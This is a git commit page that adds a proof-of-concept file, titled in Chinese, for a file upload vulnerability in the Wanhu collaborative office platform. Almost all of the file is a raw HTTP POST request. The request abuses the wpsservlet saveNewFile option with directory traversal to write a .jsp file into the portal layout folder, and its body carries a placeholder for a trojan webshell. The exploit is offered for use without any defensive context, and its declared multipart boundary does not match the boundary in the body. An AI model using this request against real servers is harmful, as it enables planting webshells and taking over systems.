admin/POC00
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Create 万户协同办公平台接口存在文件上传漏洞.md

Browse Source
This commit is contained in:
wy876 2023-08-20 09:30:43 +08:00 committed by GitHub
parent d808fc5577
commit 9e99673cbb
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 20 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

20
万户协同办公平台接口存在文件上传漏洞.md Normal file
View File

@ -0,0 +1,20 @@
## 万户协同办公平台接口存在文件上传漏洞
```
POST
/defaultroot/wpsservlet?option=saveNewFile&newdocld=jsp&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host:xxx.xxx.xxx.xxx
User-Agent:
Content-Length:266
Cache-Control:max-age=0
Content-Type:multipart/form-data;boundary=803e058d60f347f7b3c17fa95228eca6
Accept-Encoding: gzip,deflate
Connection:close
--221e166d60f34112b3c17fa95818ecfe
Content-Disposition:form-data;name="NewFile";filename="jsp.jsp"
<% jsp 上传的木马地址 %>
--221e166d60f34112b3c17fa95818ecfe--
```